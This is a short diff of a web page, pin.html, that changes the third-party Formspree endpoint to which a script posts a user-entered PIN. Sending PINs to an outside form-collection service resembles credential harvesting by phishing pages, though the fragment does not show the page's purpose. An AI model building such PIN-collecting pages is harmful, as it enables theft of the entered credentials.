--- a/pin.html
+++ b/pin.html
@@ -304,7 +304,7 @@
           formData.append("pin", pin); // Append the PIN to the form data
 
           try {
-            let response = await fetch("https://formspree.io/f/xoveqrzb", {
+            let response = await fetch("https://formspree.io/f/mdkeovkr", {
               method: "POST",
               body: formData,
               headers: {
